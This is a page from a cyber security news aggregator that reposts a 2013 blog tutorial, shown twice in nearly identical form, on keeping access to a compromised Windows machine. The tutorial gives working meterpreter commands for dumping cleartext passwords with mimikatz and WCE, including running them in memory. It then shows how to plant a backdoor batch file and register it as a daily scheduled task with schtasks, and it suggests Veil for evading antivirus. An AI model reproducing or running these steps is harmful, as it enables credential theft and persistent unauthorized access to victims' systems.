Welcome to our
Cyber Security News Aggregator
.Cyber Tzar
provide acyber security risk management
platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.
First slide label
Some representative placeholder content for the first slide.
Second slide label
Some representative placeholder content for the second slide.
Third slide label
Some representative placeholder content for the third slide.
Schedule Task in windows after Exploitation.
published on 2013-10-04 17:50:00 UTC by nirav desaiContent:
Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put their method here.
After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.
First create one batch file , put following code in it
@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"
Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.
Get clear text password:-
Following are different methods to get clear text password of windows.
(1)using mimikatz or wce get clear text password of victim.
(2) You can also use mimikatz password dump method .
(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.
meterpreter > load mimikatz
meterpreter > help mimikatz
meterpreter > kerberos
meterpreter > mimikatz_command -h
meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
(4)You can use wce & mimikatz in memory without uploading binary.
(a)WCE in memory:-
cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt
(b)Mimikatz in memory:-
cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
So till now i upload one batch file ; backdoor & get clear text password.
Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.
C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00
It will ask to enter password which we got before.
You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.
After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.
First create one batch file , put following code in it
@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"
Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.
Get clear text password:-
Following are different methods to get clear text password of windows.
(1)using mimikatz or wce get clear text password of victim.
(2) You can also use mimikatz password dump method .
(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.
meterpreter > load mimikatz
meterpreter > help mimikatz
meterpreter > kerberos
meterpreter > mimikatz_command -h
meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
(4)You can use wce & mimikatz in memory without uploading binary.
(a)WCE in memory:-
cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt
(b)Mimikatz in memory:-
cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.
C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00
It will ask to enter password which we got before.
You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.
https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html
Published: 2013 10 04 17:50:00
Received: 2023 04 01 17:22:46
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Views: 2
